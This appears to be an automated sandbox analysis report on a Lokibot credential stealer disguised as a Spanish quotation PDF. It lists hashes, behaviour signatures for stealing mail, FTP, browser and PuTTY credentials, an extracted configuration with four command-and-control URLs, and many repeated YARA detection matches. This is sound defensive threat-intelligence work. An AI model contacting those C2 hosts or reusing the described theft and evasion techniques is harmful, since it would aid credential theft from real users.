Play interactive tour

Edit tour

Windows Analysis Report Cotizaci#U00f3npdf.exe

Overview

General Information

Sample Name:	Cotizaci#U00f3npdf.exe
Analysis ID:	553335
MD5:	3fe29e21698212a70e03144bb4979632
SHA1:	b400de247096542b778aa7ed7584f6829b5bbf4e
SHA256:	c42005e0a00c3ecbaff6c1189ca8b6f1298a818878ceaebb623585c399c8ba81
Tags:	exeLoki
Infos:
Most interesting Screenshot:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Malicious sample detected (through community Yara rule)

Yara detected Lokibot

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Tries to steal Mail credentials (via file / registry access)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Yara detected aPLib compressed binary

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file registry)

Machine Learning detection for sample

Injects a PE file into a foreign processes

C2 URLs / IPs found in malware configuration

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Enables debug privileges

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

Cotizaci#U00f3npdf.exe (PID: 2604 cmdline: "C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" MD5: 3FE29E21698212A70E03144BB4979632)

Cotizaci#U00f3npdf.exe (PID: 2512 cmdline: "C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" MD5: 3FE29E21698212A70E03144BB4979632)

cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000001.00000002.506971485.0000000000728000.00000004.00000020.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000001.00000003.446107711.0000000000745000.00000004.00000001.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: Cotizaci#U00f3npdf.exe PID: 2604	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Cotizaci#U00f3npdf.exe PID: 2604	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: Cotizaci#U00f3npdf.exe PID: 2512	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Cotizaci#U00f3npdf.exe PID: 2512	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Click to see the 37 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.0.Cotizaci#U00f3npdf.exe.400000.3.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
1.0.Cotizaci#U00f3npdf.exe.400000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.3.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.3.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.3.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
1.0.Cotizaci#U00f3npdf.exe.400000.3.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.0.Cotizaci#U00f3npdf.exe.400000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.4.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.4.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.4.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
1.0.Cotizaci#U00f3npdf.exe.400000.4.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.0.Cotizaci#U00f3npdf.exe.400000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.5.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.5.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.5.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
1.0.Cotizaci#U00f3npdf.exe.400000.5.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.0.Cotizaci#U00f3npdf.exe.400000.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.6.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.6.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.6.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
1.0.Cotizaci#U00f3npdf.exe.400000.6.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.0.Cotizaci#U00f3npdf.exe.400000.4.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
1.0.Cotizaci#U00f3npdf.exe.400000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.4.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.4.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.1.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
1.0.Cotizaci#U00f3npdf.exe.400000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.1.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
1.0.Cotizaci#U00f3npdf.exe.400000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.0.Cotizaci#U00f3npdf.exe.400000.4.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
1.0.Cotizaci#U00f3npdf.exe.400000.4.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.0.Cotizaci#U00f3npdf.exe.400000.5.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
1.0.Cotizaci#U00f3npdf.exe.400000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.5.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.5.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.5.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
1.0.Cotizaci#U00f3npdf.exe.400000.5.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.0.Cotizaci#U00f3npdf.exe.400000.6.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
1.0.Cotizaci#U00f3npdf.exe.400000.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.6.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.6.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.6.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
1.0.Cotizaci#U00f3npdf.exe.400000.6.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Cotizaci#U00f3npdf.exe.3040000.4.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
0.2.Cotizaci#U00f3npdf.exe.3040000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Cotizaci#U00f3npdf.exe.3040000.4.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Cotizaci#U00f3npdf.exe.3040000.4.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Cotizaci#U00f3npdf.exe.3040000.4.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.Cotizaci#U00f3npdf.exe.3040000.4.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.1.Cotizaci#U00f3npdf.exe.400000.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
1.1.Cotizaci#U00f3npdf.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.1.Cotizaci#U00f3npdf.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.1.Cotizaci#U00f3npdf.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.1.Cotizaci#U00f3npdf.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
1.1.Cotizaci#U00f3npdf.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Cotizaci#U00f3npdf.exe.3040000.4.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13278:$s1: http:// 0x16233:$s1: http:// 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13280:$s2: https:// 0x13278:$f1: http:// 0x16233:$f1: http:// 0x13280:$f2: https://
0.2.Cotizaci#U00f3npdf.exe.3040000.4.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Cotizaci#U00f3npdf.exe.3040000.4.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.Cotizaci#U00f3npdf.exe.3040000.4.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.0.Cotizaci#U00f3npdf.exe.400000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.3.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.3.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.3.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
1.0.Cotizaci#U00f3npdf.exe.400000.3.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.Cotizaci#U00f3npdf.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Cotizaci#U00f3npdf.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.Cotizaci#U00f3npdf.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.2.Cotizaci#U00f3npdf.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
1.2.Cotizaci#U00f3npdf.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.1.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.1.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.1.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.1.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
1.1.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.2.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
1.2.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.0.Cotizaci#U00f3npdf.exe.400000.2.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
1.0.Cotizaci#U00f3npdf.exe.400000.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.2.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.0.Cotizaci#U00f3npdf.exe.400000.2.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
